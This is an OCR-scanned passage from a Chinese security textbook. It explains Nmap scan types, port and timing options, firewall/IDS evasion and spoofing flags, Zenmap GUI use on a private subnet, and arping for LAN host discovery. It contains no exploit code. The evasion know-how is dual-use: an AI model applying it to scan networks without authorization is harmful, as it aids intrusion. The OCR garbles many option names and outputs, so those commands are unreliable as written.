完成 TCP 连 接 ) ， 且 能 明确 区 分 
openlclosed|filtered。 

e -sT: TCP Connect0O 扫 描 ， 建 立 完整 
连接 ， 容 易 被 记录 ， 对 原始 报 文 控 
制 少 ， 效 率 低 但 是 准确 。 

e -SA: TCPACK 扫 描 ， 发 送 一 个 ACK 
数据 包 ， 通 过 SYN/ACK 返 回 数据 包 
类 型 判断 防火 墙 规则 。 

e -sW: TCP Window 扫 描 ，TCP 窗 口 
扫描 ， 依 赖 于 互联 网 上 少数 系统 
的 实现 细节 ， 因 此 可 信和 度 不 高 ， 
根据 窗口 大 小 来 判断 端口 是 开放 
的 〈 正 数 ) 还 是 关闭 的 (0) 。 


10.1.4 


-SM: TCP Maimon 扫 描 ， 探 测报 文 
是 FIN/ACK， 端 口 开 放 或 关闭 ， 都 
对 这 样 的 报 文 啊 应 RST 报 文 ， 但 如 
果 端 口 开 放 ， 许 多 基于 BSD 的 系统 
只 是 丢弃 该 探测 报 文 。 

-SU: 使 用 UDP 扫 描 ， 对 UDP 服 务 
进行 扫描 ， 如 DNS、SNMP、DHCP 
等 。 可 以 和 TCP 扫 描 结合 使 用 ， 但 
是 效率 低下 ， 开 放 的 和 被 过 滤 的 端 
口 很 少 响应 。 加 速 UDP 扫描 的 方法 
包括 并 发 扫描 更 多 的 主机 、 先 只 对 
主要 端口 进行 快速 扫描 、 从 防火 墙 
后 面 扫描 、 使 用 -host-timeout 中 过 慢 
速 的 主机 。 

-SN/-sF/-sX: TCP Null, FIN, and 
Xmas 扫 描 ， 从 RFC 挖 掘 的 微妙 方 
法 来 区 分 开放 关闭 端口 ; 除了 探 
测报 文 的 标志 位 不 同 ， 三 种 扫描 
在 行为 上 一 致 。 
-scanflags<flags>: 通过 指定 任意 
的 TCP 标 志 位 来 设计 扫描 ， 可 以 是 
数字 标记 值 ， 也 可 以 使 用 字符 名 如 
URG、 ACK、 PSH、 RST、 SYN、 
FIN。 

-SI <zombie host[:probeport]>: 中 间 
人 扫描 ， 利 用 中 间 人 主机 上 已 知 IP 
分 段 ID 序列 生成 算法 来 笑 探 目标 上 
开放 端口 的 信息 ， 极 端 隐蔽 ， 可 以 
指定 端口 号 ， 否 则 默认 80 端 口 。 
-SY/SZ: 是 针对 SCTP 协 议 的 扫描 ， 
很 少 使 用 。 

-SO: 卫 协 议 扫描 ， 可 以 确定 目标 机 
文 持 哪些 卫 协 议 ， 如 TCP、ICMP、 
IGMP 。 

-b <FTP relay host>: FTP 弹 跳 扫 
描 ，FTP 中 继 的 一 个 扫描 。 


端口 说 了 明和 扫描 顺序 


这 类 参数 通 背 指定 要 扫描 哪些 端口 ， 
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扫描 端口 的 顺序 是 随机 的 还 是 依次 扫描 ， 
还 可 以 指定 扫 拉 端口 的 协议 类 型 。 
下 图 为 端口 说 明和 扫描 顺序 帮助 信息 。 


PURT SPELIFILATIUN ANU SCAN URUER: 
-p <port ranges>: Only scan specified ports 
Ex: -p22; -pl1-65535; -p 1U:53,111,137,T:21-25,86,139,8080 ,5:9 
-- ude-ports <port ranges>; Exclude the specified ports from sc 
-F: Fast mode - Scan fewer ports than the default scan 
-Tr: an ports consecutive 't randomize 
-ports <number>: Scan <number> most common ports 
rt-ratio <ratio>: Scan 


参数 说 明 如 下 : 

e -p <port ranges>: 只 扫描 指定 的 端 
口 ， 单 个 端口 和 用 连 字 符 表 示 的 端 
口 范 围 都 可 以 ， 如 果 不 指定 扫描 类 
型 ， 默 认 是 TCP 和 UDP 都 扫描 ， 可 
以 通过 在 端口 号 前 加 上 T: 或 者 U: 指 
定 协议 。 例 如 : 参数 -p U:53，111， 
137，T:21-25，80，139，8080 将 扫 
描 UDP 端口 3，111， 和 137， 同 时 
扫描 列 出 的 TCP 端 口 。 

e@ --exclude-ports<port ranges>: 用 于 
过 滤 掉 其 中 的 一 段 。 

e -FE: 快速 扫描 《 仅 扫 描 100 个 最 常用 
的 端口 ) ，Nmap-services 文 件 指 定 
想 要 扫描 的 端口 ， 可 以 用 --datadir 选 
项 指定 自己 的 Nmap-services 文 件 。 

e -I: 默认 情况 下 按 随机 端口 扫 
描 ， 如 果 加 上 该 参数 ， 则 扫描 按 
照 顺 序 执行 。 

e --top-ports<number>: 指定 靠 前 的 端 
口 数 进 行 扫 摘 。 

e --port-ratio<rativ>: 扫描 一 些 更 
常见 的 端口 。 


10.1.5 ”服务 与 版 本 探测 一 一 脚本 扫 摘 


在 端口 扫描 过 程 中 可 以 判断 该 端口 使 
用 的 是 什么 类 型 的 服务 ， 这 时 使 用 下 面 这 
些 参数 来 设置 探测 服务 规则 ，Nmap 提 供 了 
大 量 的 脚本 ， 通 过 参数 指定 调用 这 些 脚本 
可 以 更 好 地 完成 扫描 任务 。 

下 图 为 服务 与 版 本 探测 帮助 信息 。 
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ERVIUE/VERSIUN VETECTIUN: 
-SV: Probe open ports to determine service/version info 
--version-intensity <level>: Set from © (light) to 9 (try all probes)} 
--version-light: Limit to most likely probes (intensity 2) 
--version-all: Try every single probe (intensity 9) 
--version-trace: Show detailed version scan activity (for debugging) 


参数 说 明 如 下 : 

e -sV: 启用 特征 探测 ， 通 过 从 特征 库 
的 比 对 判断 服务 类 型 。 

e@ --version-intensity <level>: 启用 特 

征 探 测 也 并 不 是 将 采集 的 信息 与 特 
征 库 的 所 有 信息 进行 匹配 ， 因 此 使 
用 该 参数 设置 探测 级 别 ， 探 测 级 别 
越 高 匹配 信息 越 多 。 
--version-light: 设置 扫描 级 别 为 2。 
--version-all: 设置 扫 摘 级 别 为 9。 
--version-trace: 将 扫描 的 结果 进行 
一 次 跟踪 。 

下 图 为 脚本 扫描 的 帮助 信息 。 


PCRIPT SCAN: 
-SC: equivalent to --script=default 
--Scrlipt=<Lua scripts>: <Lua scripts> is a comma separated list of 


directories, script-files or script-categories 
--script-args=<n1l=Vv1, [nN2=V2,...]>;: provide arguments to scripts 
--sCript-args-file=filename: provide NSE script args in a file 
--script-trace: Show all data sent and received 
--script-updatedb: Update the Script database. 
--script-help=<Lua scripts>: Show help about scripts. 
<Lua scripts> is a comma-separated list of script-files or 
script-categories. 


参数 说 明 如 下 : 

e -sC: 指定 一 个 具体 脚本 ，--script 参 
数 的 一 个 简写 。 

e@ --script=<Lua scripts>: 指定 一 个 Lua 
的 脚本 。 

® --script-args=<nl=v1,[n2=v2,...]>: 指 
定 脚本 的 参数 。 

e --script-args-file=filename: 同上 和 面 类 
似 ， 指 定 一 个 文件 名 作为 参数 。 

e@ --script-trace: 脚本 扫描 的 一 个 
跟 踩 。 

e@ --script-updatedb: 更 新 脚本 数 
据 库 。 

e --SscIipt-help=<Lua scripts>: 提供 脚 
本 的 帮助 信息 。 


10.1.6 系统 判断 一 一 时 间 与 性 能 


通过 Nmap 可 以 对 系统 进行 一 个 判断 ， 
另外 在 扫 拉 过程 中 如 果 扫 描 过 快 可 能 会 触 
发 一 些 报警 ， 合 理 的 配置 扫描 时 间 既 可 以 
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获取 更 多 的 信息 ， 还 可 以 使 Nmap 发 挥 出 更 
好 的 性 能 。 
下 图 为 其 帮助 信息 。 


0S DETECTION : 
-0: Enable OS detection 


--05scan-Limit: Limit 05 detection to promising targets 

--0sscan-guess: Guess 0S more aggressively 

TIMING AND PERFORMANCE: 

Options which take <time> are in seconds, or append 'ms' (milliseconds), 

's' (seconds}), 'm’' (minutes), or 'h' (hours) to the value (e.g. 36m) . 

-T<0-5>: Set timing template (higher is faster) 

--min-hostgroup/max-hostgroup <size>: Parallel host scan group sizes 

--min-parallelism/max-parallelism <numprobes>: Probe parallelization 

--Min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout <time>: Specifies 
probe round trip time. 

--max-retries <tries>: Caps number of port scan probe retransmissions. 

--host-timeout <time>: Give up on target after this Long 

--Sscan-delay/--max-scan-delay <time>: Adjust delay between probes 

--Min-rate <number>: Send packets no slower than <number> per second 

--max-rate <number>: Send packets no faster than <number> per second 


操作 系统 相关 的 参数 说 明 如 下 : 

e -O: 启用 操作 系统 检测 ，-A 可 以 同 
时 启用 操作 系统 检测 和 版 本 检测 。 
e --osscan-limit: 针对 指定 的 目标 进行 

操作 系统 检测 。 

e@ --osscan-guess: 当 Nmap 无 法 确定 所 
检测 的 操作 系统 时 ， 会 尽 可 能 地 提 
供 最 相近 的 匹配 。 

时 间 及 性 能 相关 的 参数 说 明 如 下 : 

指定 的 时 间 单 位 可 以 是 : ms(millisec- 

onds),s(seconds), m(minutes) 或 者 h(hours)。 

e -T<0-5>: 设置 时 间 模 板 ， 分 别 与 数 
字 0~~5 对 应 ， 前 两 种 模式 用 于 IDS 瞪 
避 ，Polite 模 式 降低 了 扫描 速度 以 使 
用 更 少 的 带宽 和 目标 主机 资源 。 默 
认 模 式 为 Normal， 因 此 -T3 实 际 上 未 
做 任何 优化 。Agegressive 模 式 假 设 用 
户 具有 合适 及 可 靠 的 网 络 从 而 加 速 
扫描 。Insane 模 式 假 设 用 户 具 有 特别 
快 的 网 络 或 者 为 获取 更 快速 度 而 牺 
牲 准 确 性 。 

e --mln-hostsgroup/max-hostsgroup 
<size>: 调整 并 行 扫 摘 组 的 大 小 ， 
用 于 保持 组 的 大 小 在 一 个 指定 的 范 
围 之 内 ，Nmap 具 有 并 行 扫描 多 主机 
端口 或 版 本 的 能 力 ，Nmap 将 多 个 
目标 IP 地 址 空间 分 成 组 ， 然 后 在 同 
一 时 间 对 一 个 组 进行 扫描 。 通 常 
大 的 组 更 有 效 。 缺 点 是 只 有 当 整 
个 组 扫描 结束 后 才 会 提供 主机 的 


扫描 结果 。 

e --min-parallelism/max-parallelism 
<numprobes>: 设置 探测 并 行 数 量 。 

e@ --min-rtt-timeout/max-rtt-timeout/ 
initial-rtt-timeout <time>: 设置 rtt 返 
回 时 间 。 

e --max-retries <tries>: 最 大 探测 
数量 。 

e --host-timeout <time>: 目标 主机 超 
时 时 间 ， 超 出 时 间 退 出 扫描 或 跳 过 
该 主机 扫 接 。 

© --scan-delay/--max-scan-delay 
<time>: 设置 扫描 的 延 时 时 间 ， 每 
次 探测 的 间隔 时 间 。 例 如 : Nmap 
192.168.1.1 --scan-delay 10s， 每 次 探 
测 间隔 10s 再 进行 。 

e --min-rate <number>: 每 秒 发 包 最 小 
数量 。 

ee --max-rate <number>: 每 秒 发 包 最 大 
数量 。 


10.1.7” 防火墙/ID9 租 避 和 欺骗 


在 网 络 扫描 中 不 可 避免 地 会 接触 到 
防火 墙 等 网 络 设 备 ，Nmap 提 供 了 以 下 租 
避 机 制 ， 使 用 这 些 参数 设置 相应 的 躲避 
规则 。 

下 图 为 防火 墙 /IDS 躲 避 和 欺骗 帮助 
信息 。 
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参数 说 明 如 下 : 

e -f: --mtu <val>: 将 TCP 头 分 段 在 几 
个 包 中 ， 使 得 包 过 滤器 、 IDS 以 及 
其 他 工具 的 检测 更 加 困难 ，--mtu 指 
定 最 小 MTU 单 元 。 

e@ -D <decoyl,decoy2[,ME],...>: 使 用 
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诱饵 隐蔽 扫描 ， 使 用 逗号 分 隔 每 个 
诱饵 主机 ， 也 可 用 上 自己 的 真实 IP 作 
为 诱饵 ， 这 时 可 使 用 ME 选项 说 明 。 
如 果 在 第 6 个 位 置 或 更 后 的 位 置 使 
用 ME 选项 ， 一 些 常 用 端口 扫描 检 
测 右 (如 Solar Designer’s excellent 
scanlogd) 就 不 会 报告 这 个 真实 IP。 
如 果 不 使 用 ME 选项 ，Nmap 将 真实 
IP 放 在 一 个 随机 的 位 置 。 

e -S <IP Address>: 源 地 址 欺骗 ， 说 
明 所 需 发 送 包 的 接口 IP 地 址 ， 浆 端 
是 无 法 收 到 回 包 。 

e@ -e <iface>: 指定 网 卡 接口 。 

e@ -g/--source-port <portnum>: 指定 的 
源 端 口 。 

e@ --proxies <urll,[url2],..>: 指定 代理 
服务 器 进行 扫描 。 

e@ --data <hex string>: 在 探测 数据 包 中 
加 入 一 些 数据 ， 让 探测 包 看 上 去 更 


像 正 常数 据 包 。 这 里 加 入 的 数据 是 
十 六 进 制 数 。 

e --data-string <string>: 加 入 字符 串 到 
数据 字段 。 

e --data-length <num>: 限定 数据 的 
长 度 。 

® --ip-options <options>: 加 入 也 包头 
的 options 字 段 信 息 。 


e --ttl <val>: 设置 TTL 值 。 

© --Spoof-mac <mac address/prefix/ 
vendor name>: MAC 地 址 欺骗 。 

e --badsum: 差错 校 验 ， 使 用 该 参数 
会 发 送 一 些 错误 校 验 的 数据 包 。 


10.1.8 输出 选项 参数 说 明 


扫描 到 的 结果 如 果 数 据 量 比 较 大 不 便 
于 阅读 ， 可 以 使 用 输出 项 中 的 一 些 参数 指 
定 输 出 成 不 同 格式 的 文件 。Nmap 提 供 了 方 
便 直接 但 看 的 交互 式 方式 和 方便 软件 处 理 
的 XML 格 式 ， 男 外 还 提供 了 选项 来 控制 输 
出 的 细节 以 及 调试 信息 。 
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五 种 不 同 的 输出 格式 如 下 : 

(1) interactive output。 交互 式 输 出 ， 
默认 的 输出 方式 。 

(2) normal output。 显示 较 少 的 运行 时 
间 信 息 和 告警 信息 。 

(3) XML output。 可 转换 成 HIML， 方 
便 程 序 处 理 。 

(4) grepable output。 在 一 行 中 包含 目 
标 主 机 最 多 的 信息 。 


寻找 Nmap.xsl 文 件 ， 并 使 用 它 输 出 
结果 。 

e@ --no-stylesheet: 防止 将 XSL 样 式 表 
与 wWXMLIL 输出 关联 起 来 。 


10.1.9 ”其 他 选项 帮助 信息 


这 里 包括 了 一 些 不 太 明 确 分 类 的 其 他 
选项 ， 以 及 一 些 杂 项 。 下 图 为 这 些 选项 的 
帮助 信息 。 


(5) sCRiPt KiDDi3 output 格式 。 以 脚 


本 的 形式 输出 。 


下 图 为 输出 项 的 帮助 信息 。 


-0N/-DX/-05/-06 <file>: Qutput scan in normal, XML, s|<rlpt kIddi3, 


and Grepable format, respectively, to the given filename. 


-0A <basename>: Output in the three major formats at once 

-Vv: Increase verbosity level (use -vv or more for greater effect) 

-d: Increase debugging level (use -dd or more for greater effect) 
--reason; Display the reason a port ls in a particular state 

--open:; Only show open [or possibly open) ports 

--packet-trace; Show all packets sent and received 

--iflist: Print host interfaces and routes (for debugging) 
--append-output: Append to rather than clobber specified output files 
--TESUME <filename>: Resume an aborted scan 

--StyLesheet <path/URL>: XSL stylesheet to transform XML output to HTML 
--webxml: Reference stylesheet from Nmap.0rg for more portable XML 
--nD-StyLesheet: Prevent associating of XSL stylesheet Ww/XML output 
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参数 说 明 如 下 : 

e -oN <file>: 标准 输出 。 

e -oX <file>: XML 输出 写 入 指定 的 
文件 。 

e -0S <file>: 类 似 于 交互 工具 输出 。 

e -0G <file>: Grepable 输 出 。 

e -oA <basename>: 输出 至 所 有 
格式 。 

e -v: 提高 输出 信息 的 详细 度 。 

e -d: 提高 或 设置 调试 级 别 ，9 级 最 高 。 

e --packet-trace: 跟踪 发 送 和 接收 的 
报 文 。 

e --iflist:， 输出 检测 到 的 接口 列表 和 系 
统 路 由 。 

e --append-output: 表示 在 输出 文件 中 
添加 ， 而 不 是 履 盖 原文 件 。 

e --resume <filename>: 继续 中 断 的 
扫描 。 

e@ --stylesheet <path or URL>: 设置 
XSL 样 式 表 ， 转 换 XML 输 出 到 
HTML。 在 Web 浏 览 器 中 打开 Nmap 
的 XML 输出 时 ， 将 会 在 文件 系统 中 


-6: Enable IPV6 scanning 
-A: Enable O05 detection, version detection, script scanning, and traceroute 
--datadir <dirname>: Specify custom Nmap data file location 
--send-eth/--send-ip: Send using raw ethernet frames or IP packets 
--privileged: Assume that the user is fully privileged 
--Unprivileged: Assume the user lacks raw socket privileges 

-V: Print version number 

-h: Print this help summary page. 


参数 说 明 如 下 : 
e -6: 开启 IPv6 扫 描 。 
e -A: 激烈 扫描 模式 选项 ， 这 个 选项 


启用 额外 的 高 级 和 高 强度 选项 ， 这 
个 选项 局 用 了 操作 系统 检测 〈-O ) 
和 版 本 扫描 (-sy) ， 相 当 于 以 下 扫 
描 的 组 合 。 

--datadir <dimame>: 说 明 用 户 Nmap 
数据 文件 位 置 。Nmap 在 运行 时 从 
文件 中 获得 特殊 的 数据 ， 这 些 文 
件 有 Nmap-service-probes，Nmap- 
services, Nmap-protocols, Nmap- 
rpc, Nmap-mac-prefixes 和 Nmap-os- 
fingerprints。Nmap 首 先 在 --datadir 
选项 说 明 的 目录 中 查找 这 些 文件 。 
未 找到 的 文件 ， 将 在 BMAPDIR 环 
境 变 量 说 明 的 目录 中 查找 。 接 下 来 
是 用 于 真正 和 有 效 UID 的 ~/.Nmap 
或 Nmap 可 执行 代码 的 位 置 〈 仅 
Windows32) ; 然后 是 编译 位 置 ， 
如 /usr/local/share/Nmap 或 /usr/share/ 
Nmap。Nmap 查 找 的 最 后 一 个 位 置 
是 当前 目录 。 


e --send-eth: 使 用 原 以 太 网 帧 发 送 。 
e --send-ip: 在 原 IP 层 发 送 。 
e --privileged: 假定 用 户 具 有 全 部 


权限 。 


--interactive: 在 交互 模式 下 启动 。 
-V: 打印 版 本 信息 ， 也 可 表示 为 
--Version。 

e -h: 打印 一 个 短 的 帮助 屏幕 ， 也 可 
表示 为 --help。 


10.1.10 Nmap 图 形 模式 


最 后 使 用 Zenmap 命 令 ， 可 以 开启 Nmap 
图 形 模式 。 其 中 包含 多 种 扫描 选项 ， 它 对 
网 络 中 被 检测 到 的 主机 按照 选择 的 扫描 选 
pera 用 户 可 以 建立 一 

需要 扫描 的 范围 ， 这 样 就 不 需要 再 输入 
的 IP 地 址 和 主机 名 了 。 

使 用 Nmap 图 形 模式 进行 扫描 的 具体 操 
作 方 法 如 下 : 
sep 回 打开 Nmap 图 形 操作 界面 ， 如 下 图 
所 示 。 


全 Zenmap 一 口 X 
扫 扫 加 ”工具 四” 配 于 (p) 寺 助 (H) 
目标 : 忠告 :Intense scan 3 Ep = 


命令: nmap -T4 -A-v 


民 和 2 Nmap 辖 出 端口 /主机 拓扑 主机 明细 扫 交 


渗 作 系统 4 主机。 。 2: 


过 党 主 机 


[seep 图 要 扫描 单 台 主机 ， 可 以 在 “目标 ”后 
的 文本 框 内 输入 主机 的 IP 地 址 或 网 址 ; 要 扫 
描 某 个 范围 内 的 主机 ， 可 以 在 该 文本 框 中 
输入 192.168.0.1-150， 如 下 图 所 示 。 


> Zenmap 口 X 
扫 招 器” 工 只 配 玛 (p) ”六 助 {H) 


目标 : | 192.168.0.1-150| 卫 兰 :Intense scan v| | 扫 商 | | 六 
使 入 nmap -T4 -A -v 192.168.0.1-150 

展 和 |。 Nmap 边 出 端口 /主机 拓扑 主机 明细 扫 净 

舌 作 系统 4 主机 a 玉河 


过 污 主 机 
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侈 提示 : 在 打 描 时 ， 还 可 以 用 “*” 替 换 掉 
IP 地 址 中 的 任何 一 部 分 ， 如 “192.168.1.*” 
等 同 于 “192.168.1.1-255”; 要 扫描 一 个 更 
大 范围 内 的 主机 ， 可 以 输入 “192.168.1， 
2，3.*”， 此 时 将 扫描 “192.168.1.0”“19 
2.168.2.0”“192.168.3.0” 三 个 网 络 中 的 所 
有 地 址 。 


要 设置 网 络 扫描 的 不 同 配置 文件 ， 
可 以 单 击 “配置 ”后 的 下 拉 列 表 框 ， 从 中 
选择 Intense scan、Intense scan plus UDP 和 
Intense scan,all TCP ports 等 选项 ， 从 而 对 网 
络 主机 进行 不 同方 面 的 扫描 ， 如 下 图 所 示 。 


扫 撕 (a) 工具 站” 配 嫩 (P) 帮助 (H) 
目标 ;| 192.168.0.1-150 


配 羡 : Intense scan 


命令 ;nmap -T4 -A -v 192.168.0.1-150 Intense scan 


操作 系统 4 主机 ^ 


Intense scan Plus UDP 


N -一 
mp 输出 满口 /主机 Intense scan, all TCP ports 


Intense scan no ping 明 综 
Ping scan 

Quick scan 

Quick scan plus 
Quick traceroute 


Regular scan 


Slow comprehensve scan 


过 小 主机 


单 击 “ 扫 描 ” 按 钮 开始 扫描 ， 稍 等 一 
会 儿 ， 即 可 在 “Nmap 输出 ”选项 卡 中 显示 
扫描 信息 ， 在 扫描 结果 信息 中 ， 可 以 看 到 扫 
描 对 象 当 前 开放 的 端口 信息 ， 如 下 图 所 示 。 


全 Zenmap 一 口 x 
扫把 a) 工 呈 中” 配 嫩 (D) 帮助 (H) 


目 坏 。 192.168.0.1-150 | 配 于 :Intensc scan ~| | 扫 冶 | | 到 消 

命令 ; nmap -T4 -A -v 192.158.0.1-150 

服务 。。。 Nmap 棕 出 尝 D/ 主 机 托 让 ， 主 机 明明 反光 

操作 未 统 1 主人， <， nmasp-74-4- 7190215801-150 v| 5 用 竺 
Nmap scan raport for 192.168.0.145 [host down] 人 


Nmap scan report for 192.1686.09.149 [host pa 
Nm eport for 192.168.0.158 [host do 
Initiating th DNS rasolution of 1 a at 2 ql 
=te 1iel DNS resolution of 1 host. at 12:41, 8 61s elapsed 
Initinting ee es 5can ot 2 <41 
i888 ports/h 


Scanning 3 ho 

Discover Ca a i i 166 
Discovered open port 445/tcp on 192. ee ee 
Discovered open port 139/tcp on 192.1 

Discovered open port i39/tcp on 192. ey rh a 
Discovered open port i135/tcp on 192.168.0.106 
Discovered open port 135/tcp on 192.168.0.112 
D d open port 88/tcp on 192.168.80.1 
Discovered open port 2869/tcp on 192.168.6.166 
rs ed ed open port 2869/tcp 192.168.8.112 
Discovered a port 5357/tcp on 192.168.8.112 
re g| rt _ 1568/tcp on 192.168.6.1 
Completed SYM tLth Scan against 192.168.0.186 in 7.935 (2 hosts 
lertt) 

Conpleted SYM Steslth Scan nmEainst 192.168.0.112 i 


n 7.945 (1 host 
left) 
Conplated SYM Stealth Scan at 12:41, 7.96s elapsed [3888 total v 


过 店主 机 


选择 “端口 /主机 ”选项 卡 ， 在 打开 
的 界面 中 可 以 看 到 当前 主机 显示 的 端口 、 
协议 、 状 态 和 服务 信息 ， 如 下 图 所 示 。 


169 


黑客 攻防 与 无 线 巡 全 从 新 手 到 高 手 ( 超 值 版 ) 


> Zenmap ~ OD x :a 选项 卡 ， A ei eg 


扫把 甸 ) 工具 四 禹 可 人) 邦 助 (H) 


EE 标 。 192.168.0.1-150 ~| 本 号 Intense scan ~| 上 的 区 有 如 端 Eh 协议 、】 厂 态 等 ， 如 下 图 所 下 。 


命令 :nmap -14 -A -v 192.168.0.1-150 


服务 。 ”Nmap 输出 详 口 /主机 拓 站 主机 明 胃 把 交 


作 未 霸 4 主机 1 访 口 4 协议 + 状 赤 4 服务 4 版 本 
口 192.168.0.1 @ 80 tp open htp 
4 1921680104 |@ 1900 tcp open upnp 192 168.0.106 车 口 (2 乔 9i 医 口 (998) 特 兴 字 积 
和 192.168.0.106 192.168.0.112 端口 4 协议 4 状态 4 服务 4 方法 
蛋 192.168.0.112 192.168.0.104 由 80 tcp open http probed 


白 1900 tcp open upnp table 


step 图 选择 “拓扑 ”选项 卡 ， 在 打开 的 界 


面 ee 前 网 络 中 计算 机 的 拓扑 结 
构 ， 如 下 图 所 示 。 选择 “路 由 追踪 ”选项 卡 ， 在 打开 的 
界面 中 可 以 查看 当前 主机 的 路 由 器 信息 ， 


全 Zenmap 一 口 纱 Be 
当 控 器 ) 工具 辐 ” 配 到 (2) 帮助 刷 如 下 图 所 示 。 
目 款 。 192.168.0.1-150 ls | intense scan ~| [| 世 


命令 :nmap -14 -A -v 192.168.0.1-150 


服务 ”Nmap 输出 党 /主机 丘 i| 主机 明 = 阁 


TE TT 


作 系 流 4 主机 ~“ 各 二 主机 们 总 Fisheye 换 作 本 村 Legend | 保存 到 去 
口 192.168.0.1 本 192.168.0.106 
外 192.168.0.104 192.168.0.112 
全 192.168.0.106 192.168.0.104 
三 192.168.0.112 
Or: 6104 


=b=/<b= 详 口 路 自 追 妓 信 息 总 共 <b=1=<b> 次 己 知 的 幅 . 


[step 国 单 击 “查看 主机 信息 ”按钮 ， 打 开 
看 主 机 信息 ”窗口 ， 在 其 中 可 以 查看 在 Nmap 操 作 界 面 中 选择 “主机 明 

当前 主机 的 一 二 让。 关 作 闲话 入 二 全 细 ” 选 项 卡 ， 在 打开 的 界面 中 可 以 查看 当 
如 下 图 所 示 。 前 主机 的 明细 人 信息， 包括 主机 状态 、 地 址 
一 上 5x] 列表、 操作 系统 等 ， 如 下 图 所 示 。 


全 Zenmap 一 口 Xx 
扫 控 甸 ) 如 站 ”瑟瑟 ) 大 助 {H) 


192.168.0.106 
192.168.0.112 地 址 : [pv4] 192.168.01 起 目标 192.168.0.1-150 ~| 本 可 :Intense scan | 扫 病 | | 久 洛 
192.168.0.104 命令 ; |nmap -T4 -A -v 192.168.0.1-150 | 
主机 名 : 
服务 。。。 Nmap 检 出 党 /主机 托 着 “主机 明细 反光 
最 后 启动 : INed Aug 02 03:42:45 2017 [1155577 种 j。 
作 系 流 《 主机 ~ |S:192.1680.1; 
日 操作 系统 L 192.168.0.1 局 主机 装 志 
80n 一 中 192.168.0.104 状态 : up 
已 使 用 关口 : cp open v 
上 外。 192.168.0.106 开放 守 D: 2 Ey 
D 医 三 ”192.168.0.112 过 这 ED 998 
J : 
页 配 类别 : 老 纹 未 开放 泡 口 ， 0 
% 4 名 称 已 当 撞 闪 口 : 1000 四 
98 ”Cancn imageRUNNER C5185 printer 区 上 过半 加 :1155577 Ni 
> 乓 后 宫 动 : Wed Aug 02 03:42:45 2017 
局 地 直列 表 
日 序列 Ipv4 192.168.0.1 
IPv6 帮 知 


MAKC 闻 址 ， F4;83:CD:3350:73 


在 查 看 主机 信 息 ” 窗 口 中 选择 " 服 : en - Se Canon imageRUNNER C5185 printer v 
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10.2 ”二 层 扫 描 


数据 链 路 层 的 数据 单位 为 帧 ， 主 要 分 
为 : 逻辑 链 路 控制 (LLC) 和 介质 访问 控 
制 (MAC)， 其 中 主要 的 协议 是 ARP (Ad- 
dress Resolution Protocol， 地 址 解析 协议 ) 
协议 ， 它 将 32 位 IP 地 址 解析 为 48 位 以 太 网 
地 址 ， 需 要 注意 的 是 ，ARP 协 议 对 应 二 层 
广播 包 ， 而 广播 包 是 无 法 通过 路 由 或 网 关 
访问 外 部 地 址 的 。 


10.2.1 使 用 arping 命 令 


使 用 arping 命 令 回 局 域 网 内 的 其 他 主机 
发 送 ARP 请 求 的 指令 ， 可 以 用 来 测试 局 域 
网 内 的 某 个 IP 是 否 已 被 使 用 ， 其 中 被 使 用 的 
IP 地 址 为 在 线 主机 。 命 令 格 式 如 下 : 


[-AbDfhaUV] 
[-s sourcel] 


arping 人 ee IE 


deadlinel] 


参数 说 明 如 下 : 
-A: ARP 回 复 模式 ， 更 新 邻 大。 
-b: 保持 广播 。 
-D: 复制 地 址 检测 模式 。 
: 得 到 第 一 个 回复 就 退出 。 
-qd: 不 显示 警告 信息 。 
-U: 主动 的 ARP 模 式 ， 更 新 邻 大 。 
可 选择 参数 介绍 如 下 : 
-c: 发 送 的 数据 包 的 数目 。 
-Ww: 设置 超时 时 间 。 
-I: 使 用 指定 的 以 太 网 设备 ， 默 认 
情况 下 使 用 eth0。 

e -s: 指定 源 IP 地 址 。 

@ -h: 显示 帮助 信息 。 

e -V: 显示 版 本 信息 。 

使 用 arpping 命 令 查 询 IP 地 址 或 MAC 地 
址 的 操作 步骤 如 下 : 
查看 某 个 IP 地 址 的 MAC 地 址 ， 使 用 
arping 192.168.1.1 命 令 ， 执 行 效果 如 下 图 所 
示 。 如 果 数 据 包 正确 返回 ， 则 都 会 包含 一 
个 bytes form 字 段 。 


[-I Interfacej] 


ee ee e@ © 
1 
| 
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rooftgKaUI:- 冰 arping LI92.168.1.1 
ARPING 192.168.1.1 


50 bytes from lc:fa:68:01:2f;08 (192.168.1.1): index=1 time=947.757 USeC | 吕 
650 bytes from lc:fa:68:01:2f;08 (192.168.1.1): index=2 time=1.457 msec 
rc 

-- 192.168.1.1 statistics --- 

B packets transmitted, 3 packets received, 0% unanswered (0 extra) 
rtt min/avg/max/std-dev = 0.273/0.893/1.457/0.485 ms 


[step 图 在 查询 某 个 IP 地 址 的 MAC 地 址 时 ， 
如 果 想 在 发 送 ARP 数 据 包 的 过 程 中 ， 指 
定 ARP 数 据 包 的 数量 ， 可 以 使 用 arping 一 
c 1 192.168.1.1 命 令 ， 执 行 效果 如 下 图 
所 示 。 


root@kali:-# arping -c2 192.168.1.1 

ARPING 192.168.1.1 

69 bytes from lc:fa:68:061:2f:;:08 [192.166.1.1): index=0 time=1.265 msec 
60 bytes from lc:fa:68:01:2f:068 (192.168.1.1): index=1 time=340.555 Usec 


-- 192.168.1.1 statistics --- 
2 packets transmitted, 2 packets received, Og% unanswered (0 extra) 
rtt min/ava/max/std-dev = 0.341/0.803/1.265/0.462 ms 


当 有 多 块 网 卡 时 ， 需 要 指定 特定 的 设 
备 来 发 送 ARP 数 据 包 ， 这 时 需要 使 用 arping 
-TIeth0 -c 1 192.168.1.1 命 令 ， 执 行 效 果 如 下 
图 所 示 。 


root@kali:-# arping -i eth9 -c 1 192.166.1.1 
ARPING 192.168.1.1 
60 bytes from lc:fa:68:01:2f:08 (192.168.1.1): index=0 time=930.6990 usec 


-- 192.168.1.1 statistics --- 
1 packets transmitted, 1 packets received, gs unanswered (9 extra) 
rtt min/avg/max/std-dev = 0.931/0.931/8.931/8.808 ms 


查看 某 个 IP 是 否 被 不 同 的 MAC 占 
用 ， 这 时 可 以 使 用 arping -d 192.168.1.15 命 
令 ， 执 行 效果 如 下 图 所 示 。 如 果 存在 被 不 
同 MAC 占用 的 情况 ， 则 有 可 能 是 ARP 地 址 
欺骗 。 


FoOoTEGKaLI:~ 开 arping -d TI92.I68.I.I5 
ARPING 192.168.1.15 

Timeout 

Timeout 

Timeout 


-- 192.168.1.15 statistics --- 
B packets transmitted, 0 pacxkets received, 100% unanswered (9 extra) 


查看 菜 个 MAC 地 址 的 人 P 地 址 ， 需 要 在 
同一 子 网 中 才能 查 到 ， 这 时 需要 使 用 arping 
